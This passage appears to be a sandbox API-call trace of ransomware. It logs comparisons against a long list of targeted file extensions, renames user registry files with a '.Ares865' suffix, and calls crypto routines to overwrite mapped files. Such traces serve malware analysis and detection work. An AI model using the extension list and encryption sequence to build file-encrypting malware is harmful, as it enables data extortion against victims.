(lpString=".lnk") returned 4 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".lnk") returned 1 [0057.574] lstrlenW (lpString=".ini") returned 4 [0057.574] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".ini") returned 1 [0057.574] lstrlenW (lpString=".sys") returned 4 [0057.575] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".sys") returned 1 [0057.575] lstrlenW (lpString="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 55 [0057.575] lstrlenW (lpString="bak") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="bak") returned 1 [0057.575] lstrlenW (lpString="ba_") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="ba_") returned 1 [0057.575] lstrlenW (lpString="dbb") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="dbb") returned -1 [0057.575] lstrlenW (lpString="vmdk") returned 4 [0057.575] lstrcmpiW (lpString1=".blf", lpString2="vmdk") returned -1 [0057.575] lstrlenW (lpString="rar") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="rar") returned -1 [0057.575] lstrlenW (lpString="zip") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="zip") returned -1 [0057.575] lstrlenW (lpString="tgz") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="tgz") returned -1 [0057.575] lstrlenW (lpString="vbox") returned 4 [0057.575] lstrcmpiW (lpString1=".blf", lpString2="vbox") returned -1 [0057.575] lstrlenW (lpString="vdi") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="vdi") returned -1 [0057.575] lstrlenW (lpString="vhd") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="vhd") returned -1 [0057.575] lstrlenW (lpString="vhdx") returned 4 [0057.575] lstrcmpiW (lpString1=".blf", lpString2="vhdx") returned -1 [0057.575] lstrlenW (lpString="avhd") returned 4 [0057.575] lstrcmpiW (lpString1=".blf", lpString2="avhd") returned -1 [0057.575] lstrlenW (lpString="db") returned 2 [0057.575] lstrcmpiW (lpString1="lf", lpString2="db") returned 1 [0057.575] lstrlenW (lpString="db2") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="db2") returned -1 [0057.575] lstrlenW (lpString="db3") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="db3") returned -1 [0057.575] lstrlenW (lpString="dbf") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="dbf") returned -1 [0057.575] lstrlenW (lpString="mdf") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="mdf") returned -1 [0057.575] lstrlenW (lpString="mdb") returned 3 [0057.575] lstrcmpiW (lpString1="blf", lpString2="mdb") returned -1 [0057.576] lstrlenW (lpString="sql") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="sql") returned -1 [0057.576] lstrlenW (lpString="sqlite") returned 6 [0057.576] lstrcmpiW (lpString1="TM.blf", lpString2="sqlite") returned 1 [0057.576] lstrlenW (lpString="sqlite3") returned 7 [0057.576] lstrcmpiW (lpString1=".TM.blf", lpString2="sqlite3") returned -1 [0057.576] lstrlenW (lpString="sqlitedb") returned 8 [0057.576] lstrcmpiW (lpString1="}.TM.blf", lpString2="sqlitedb") returned -1 [0057.576] lstrlenW (lpString="xml") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="xml") returned -1 [0057.576] lstrlenW (lpString="$er") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="$er") returned 1 [0057.576] lstrlenW (lpString="4dd") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="4dd") returned 1 [0057.576] lstrlenW (lpString="4dl") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="4dl") returned 1 [0057.576] lstrlenW (lpString="^^^") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="^^^") returned 1 [0057.576] lstrlenW (lpString="abs") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="abs") returned 1 [0057.576] lstrlenW (lpString="abx") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="abx") returned 1 [0057.576] lstrlenW (lpString="accdb") returned 5 [0057.576] lstrcmpiW (lpString1="M.blf", lpString2="accdb") returned 1 [0057.576] lstrlenW (lpString="accdc") returned 5 [0057.576] lstrcmpiW (lpString1="M.blf", lpString2="accdc") returned 1 [0057.576] lstrlenW (lpString="accde") returned 5 [0057.576] lstrcmpiW (lpString1="M.blf", lpString2="accde") returned 1 [0057.576] lstrlenW (lpString="accdr") returned 5 [0057.576] lstrcmpiW (lpString1="M.blf", lpString2="accdr") returned 1 [0057.576] lstrlenW (lpString="accdt") returned 5 [0057.576] lstrcmpiW (lpString1="M.blf", lpString2="accdt") returned 1 [0057.576] lstrlenW (lpString="accdw") returned 5 [0057.576] lstrcmpiW (lpString1="M.blf", lpString2="accdw") returned 1 [0057.576] lstrlenW (lpString="accft") returned 5 [0057.576] lstrcmpiW (lpString1="M.blf", lpString2="accft") returned 1 [0057.576] lstrlenW (lpString="adb") returned 3 [0057.576] lstrcmpiW (lpString1="blf", lpString2="adb") returned 1 [0057.576] lstrlenW (lpString="adb") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="adb") returned 1 [0057.577] lstrlenW (lpString="ade") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="ade") returned 1 [0057.577] lstrlenW (lpString="adf") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="adf") returned 1 [0057.577] lstrlenW (lpString="adn") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="adn") returned 1 [0057.577] lstrlenW (lpString="adp") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="adp") returned 1 [0057.577] lstrlenW (lpString="alf") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="alf") returned 1 [0057.577] lstrlenW (lpString="ask") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="ask") returned 1 [0057.577] lstrlenW (lpString="btr") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="btr") returned -1 [0057.577] lstrlenW (lpString="cat") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="cat") returned -1 [0057.577] lstrlenW (lpString="cdb") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="cdb") returned -1 [0057.577] lstrlenW (lpString="ckp") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="ckp") returned -1 [0057.577] lstrlenW (lpString="cma") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="cma") returned -1 [0057.577] lstrlenW (lpString="cpd") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="cpd") returned -1 [0057.577] lstrlenW (lpString="dacpac") returned 6 [0057.577] lstrcmpiW (lpString1="TM.blf", lpString2="dacpac") returned 1 [0057.577] lstrlenW (lpString="dad") returned 3 [0057.577] lstrcmpiW (lpString1="blf", lpString2="dad") returned -1 [0057.577] lstrlenW (lpString="dadiagrams") returned 10 [0057.577] lstrcmpiW (lpString1="ec}.TM.blf", lpString2="dadiagrams") returned 1 [0057.577] lstrlenW (lpString="daschema") returned 8 [0057.577] lstrcmpiW (lpString1="}.TM.blf", lpString2="daschema") returned -1 [0057.577] lstrlenW (lpString="db-journal") returned 10 [0057.577] lstrcmpiW (lpString1="ec}.TM.blf", lpString2="db-journal") returned 1 [0057.577] lstrlenW (lpString="db-shm") returned 6 [0057.577] lstrcmpiW (lpString1="TM.blf", lpString2="db-shm") returned 1 [0057.577] lstrlenW (lpString="db-wal") returned 6 [0057.578] lstrcmpiW (lpString1="TM.blf", lpString2="db-wal") returned 1 [0057.578] lstrlenW (lpString="dbc") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dbc") returned -1 [0057.578] lstrlenW (lpString="dbs") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dbs") returned -1 [0057.578] lstrlenW (lpString="dbt") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dbt") returned -1 [0057.578] lstrlenW (lpString="dbv") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dbv") returned -1 [0057.578] lstrlenW (lpString="dbx") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dbx") returned -1 [0057.578] lstrlenW (lpString="dcb") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dcb") returned -1 [0057.578] lstrlenW (lpString="dct") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dct") returned -1 [0057.578] lstrlenW (lpString="dcx") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dcx") returned -1 [0057.578] lstrlenW (lpString="ddl") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="ddl") returned -1 [0057.578] lstrlenW (lpString="dlis") returned 4 [0057.578] lstrcmpiW (lpString1=".blf", lpString2="dlis") returned -1 [0057.578] lstrlenW (lpString="dp1") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dp1") returned -1 [0057.578] lstrlenW (lpString="dqy") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dqy") returned -1 [0057.578] lstrlenW (lpString="dsk") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dsk") returned -1 [0057.578] lstrlenW (lpString="dsn") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dsn") returned -1 [0057.578] lstrlenW (lpString="dtsx") returned 4 [0057.578] lstrcmpiW (lpString1=".blf", lpString2="dtsx") returned -1 [0057.578] lstrlenW (lpString="dxl") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="dxl") returned -1 [0057.578] lstrlenW (lpString="eco") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="eco") returned -1 [0057.578] lstrlenW (lpString="ecx") returned 3 [0057.578] lstrcmpiW (lpString1="blf", lpString2="ecx") returned -1 [0057.579] lstrlenW (lpString="edb") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="edb") returned -1 [0057.579] lstrlenW (lpString="epim") returned 4 [0057.579] lstrcmpiW (lpString1=".blf", lpString2="epim") returned -1 [0057.579] lstrlenW (lpString="fcd") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fcd") returned -1 [0057.579] lstrlenW (lpString="fdb") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fdb") returned -1 [0057.579] lstrlenW (lpString="fic") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fic") returned -1 [0057.579] lstrlenW (lpString="flexolibrary") returned 12 [0057.579] lstrcmpiW (lpString1="e3ec}.TM.blf", lpString2="flexolibrary") returned -1 [0057.579] lstrlenW (lpString="fm5") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fm5") returned -1 [0057.579] lstrlenW (lpString="fmp") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fmp") returned -1 [0057.579] lstrlenW (lpString="fmp12") returned 5 [0057.579] lstrcmpiW (lpString1="M.blf", lpString2="fmp12") returned 1 [0057.579] lstrlenW (lpString="fmpsl") returned 5 [0057.579] lstrcmpiW (lpString1="M.blf", lpString2="fmpsl") returned 1 [0057.579] lstrlenW (lpString="fol") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fol") returned -1 [0057.579] lstrlenW (lpString="fp3") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fp3") returned -1 [0057.579] lstrlenW (lpString="fp4") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fp4") returned -1 [0057.579] lstrlenW (lpString="fp5") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fp5") returned -1 [0057.579] lstrlenW (lpString="fp7") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fp7") returned -1 [0057.579] lstrlenW (lpString="fpt") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="fpt") returned -1 [0057.579] lstrlenW (lpString="frm") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="frm") returned -1 [0057.579] lstrlenW (lpString="gdb") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="gdb") returned -1 [0057.579] lstrlenW (lpString="gdb") returned 3 [0057.579] lstrcmpiW (lpString1="blf", lpString2="gdb") returned -1 [0057.580] lstrlenW (lpString="grdb") returned 4 [0057.580] lstrcmpiW (lpString1=".blf", lpString2="grdb") returned -1 [0057.580] lstrlenW (lpString="gwi") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="gwi") returned -1 [0057.580] lstrlenW (lpString="hdb") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="hdb") returned -1 [0057.580] lstrlenW (lpString="his") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="his") returned -1 [0057.580] lstrlenW (lpString="ib") returned 2 [0057.580] lstrcmpiW (lpString1="lf", lpString2="ib") returned 1 [0057.580] lstrlenW (lpString="idb") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="idb") returned -1 [0057.580] lstrlenW (lpString="ihx") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="ihx") returned -1 [0057.580] lstrlenW (lpString="itdb") returned 4 [0057.580] lstrcmpiW (lpString1=".blf", lpString2="itdb") returned -1 [0057.580] lstrlenW (lpString="itw") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="itw") returned -1 [0057.580] lstrlenW (lpString="jet") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="jet") returned -1 [0057.580] lstrlenW (lpString="jtx") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="jtx") returned -1 [0057.580] lstrlenW (lpString="kdb") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="kdb") returned -1 [0057.580] lstrlenW (lpString="kexi") returned 4 [0057.580] lstrcmpiW (lpString1=".blf", lpString2="kexi") returned -1 [0057.580] lstrlenW (lpString="kexic") returned 5 [0057.580] lstrcmpiW (lpString1="M.blf", lpString2="kexic") returned 1 [0057.580] lstrlenW (lpString="kexis") returned 5 [0057.580] lstrcmpiW (lpString1="M.blf", lpString2="kexis") returned 1 [0057.580] lstrlenW (lpString="lgc") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="lgc") returned -1 [0057.580] lstrlenW (lpString="lwx") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="lwx") returned -1 [0057.580] lstrlenW (lpString="maf") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="maf") returned -1 [0057.580] lstrlenW (lpString="maq") returned 3 [0057.580] lstrcmpiW (lpString1="blf", lpString2="maq") returned -1 [0057.581] lstrlenW (lpString="mar") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mar") returned -1 [0057.581] lstrlenW (lpString="marshal") returned 7 [0057.581] lstrcmpiW (lpString1=".TM.blf", lpString2="marshal") returned -1 [0057.581] lstrlenW (lpString="mas") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mas") returned -1 [0057.581] lstrlenW (lpString="mav") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mav") returned -1 [0057.581] lstrlenW (lpString="maw") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="maw") returned -1 [0057.581] lstrlenW (lpString="mdbhtml") returned 7 [0057.581] lstrcmpiW (lpString1=".TM.blf", lpString2="mdbhtml") returned -1 [0057.581] lstrlenW (lpString="mdn") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mdn") returned -1 [0057.581] lstrlenW (lpString="mdt") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mdt") returned -1 [0057.581] lstrlenW (lpString="mfd") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mfd") returned -1 [0057.581] lstrlenW (lpString="mpd") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mpd") returned -1 [0057.581] lstrlenW (lpString="mrg") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mrg") returned -1 [0057.581] lstrlenW (lpString="mud") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mud") returned -1 [0057.581] lstrlenW (lpString="mwb") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="mwb") returned -1 [0057.581] lstrlenW (lpString="myd") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="myd") returned -1 [0057.581] lstrlenW (lpString="ndf") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="ndf") returned -1 [0057.581] lstrlenW (lpString="nnt") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="nnt") returned -1 [0057.581] lstrlenW (lpString="nrmlib") returned 6 [0057.581] lstrcmpiW (lpString1="TM.blf", lpString2="nrmlib") returned 1 [0057.581] lstrlenW (lpString="ns2") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="ns2") returned -1 [0057.581] lstrlenW (lpString="ns3") returned 3 [0057.581] lstrcmpiW (lpString1="blf", lpString2="ns3") returned -1 [0057.582] lstrlenW (lpString="ns4") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="ns4") returned -1 [0057.582] lstrlenW (lpString="nsf") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="nsf") returned -1 [0057.582] lstrlenW (lpString="nv") returned 2 [0057.582] lstrcmpiW (lpString1="lf", lpString2="nv") returned -1 [0057.582] lstrlenW (lpString="nv2") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="nv2") returned -1 [0057.582] lstrlenW (lpString="nwdb") returned 4 [0057.582] lstrcmpiW (lpString1=".blf", lpString2="nwdb") returned -1 [0057.582] lstrlenW (lpString="nyf") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="nyf") returned -1 [0057.582] lstrlenW (lpString="odb") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="odb") returned -1 [0057.582] lstrlenW (lpString="odb") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="odb") returned -1 [0057.582] lstrlenW (lpString="oqy") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="oqy") returned -1 [0057.582] lstrlenW (lpString="ora") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="ora") returned -1 [0057.582] lstrlenW (lpString="orx") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="orx") returned -1 [0057.582] lstrlenW (lpString="owc") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="owc") returned -1 [0057.582] lstrlenW (lpString="p96") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="p96") returned -1 [0057.582] lstrlenW (lpString="p97") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="p97") returned -1 [0057.582] lstrlenW (lpString="pan") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="pan") returned -1 [0057.582] lstrlenW (lpString="pdb") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="pdb") returned -1 [0057.582] lstrlenW (lpString="pdm") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="pdm") returned -1 [0057.582] lstrlenW (lpString="pnz") returned 3 [0057.582] lstrcmpiW (lpString1="blf", lpString2="pnz") returned -1 [0057.582] lstrlenW (lpString="qry") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="qry") returned -1 [0057.583] lstrlenW (lpString="qvd") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="qvd") returned -1 [0057.583] lstrlenW (lpString="rbf") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="rbf") returned -1 [0057.583] lstrlenW (lpString="rctd") returned 4 [0057.583] lstrcmpiW (lpString1=".blf", lpString2="rctd") returned -1 [0057.583] lstrlenW (lpString="rod") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="rod") returned -1 [0057.583] lstrlenW (lpString="rodx") returned 4 [0057.583] lstrcmpiW (lpString1=".blf", lpString2="rodx") returned -1 [0057.583] lstrlenW (lpString="rpd") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="rpd") returned -1 [0057.583] lstrlenW (lpString="rsd") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="rsd") returned -1 [0057.583] lstrlenW (lpString="sas7bdat") returned 8 [0057.583] lstrcmpiW (lpString1="}.TM.blf", lpString2="sas7bdat") returned -1 [0057.583] lstrlenW (lpString="sbf") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="sbf") returned -1 [0057.583] lstrlenW (lpString="scx") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="scx") returned -1 [0057.583] lstrlenW (lpString="sdb") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="sdb") returned -1 [0057.583] lstrlenW (lpString="sdc") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="sdc") returned -1 [0057.583] lstrlenW (lpString="sdf") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="sdf") returned -1 [0057.583] lstrlenW (lpString="sis") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="sis") returned -1 [0057.583] lstrlenW (lpString="spq") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="spq") returned -1 [0057.583] lstrlenW (lpString="te") returned 2 [0057.583] lstrcmpiW (lpString1="lf", lpString2="te") returned -1 [0057.583] lstrlenW (lpString="teacher") returned 7 [0057.583] lstrcmpiW (lpString1=".TM.blf", lpString2="teacher") returned -1 [0057.583] lstrlenW (lpString="tmd") returned 3 [0057.583] lstrcmpiW (lpString1="blf", lpString2="tmd") returned -1 [0057.584] lstrlenW (lpString="tps") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="tps") returned -1 [0057.584] lstrlenW (lpString="trc") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="trc") returned -1 [0057.584] lstrlenW (lpString="trc") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="trc") returned -1 [0057.584] lstrlenW (lpString="trm") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="trm") returned -1 [0057.584] lstrlenW (lpString="udb") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="udb") returned -1 [0057.584] lstrlenW (lpString="udl") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="udl") returned -1 [0057.584] lstrlenW (lpString="usr") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="usr") returned -1 [0057.584] lstrlenW (lpString="v12") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="v12") returned -1 [0057.584] lstrlenW (lpString="vis") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="vis") returned -1 [0057.584] lstrlenW (lpString="vpd") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="vpd") returned -1 [0057.584] lstrlenW (lpString="vvv") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="vvv") returned -1 [0057.584] lstrlenW (lpString="wdb") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="wdb") returned -1 [0057.584] lstrlenW (lpString="wmdb") returned 4 [0057.584] lstrcmpiW (lpString1=".blf", lpString2="wmdb") returned -1 [0057.584] lstrlenW (lpString="wrk") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="wrk") returned -1 [0057.584] lstrlenW (lpString="xdb") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="xdb") returned -1 [0057.584] lstrlenW (lpString="xld") returned 3 [0057.584] lstrcmpiW (lpString1="blf", lpString2="xld") returned -1 [0057.584] lstrlenW (lpString="xmlff") returned 5 [0057.584] lstrcmpiW (lpString1="M.blf", lpString2="xmlff") returned -1 [0057.584] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.Ares865") returned 85 [0057.584] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.ares865"), dwFlags=0x1) returned 1 [0057.585] CreateFileW (lpFileName="C:\\Users\\Default User\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.Ares865" (normalized: "c:\\users\\default user\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.585] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=65536) returned 1 [0057.586] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.586] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.586] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.586] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0057.587] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.587] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.587] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10300, lpName=0x0) returned 0x164 [0057.588] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10300) returned 0x190000 [0057.593] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0057.594] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.594] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0057.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0057.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.594] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.594] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.595] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.595] CloseHandle (hObject=0x164) returned 1 [0057.595] CloseHandle (hObject=0x15c) returned 1 [0057.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.597] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.597] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8da2d3a, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0xf8da2d3a, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0xf8e8757c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0057.597] lstrcmpiW 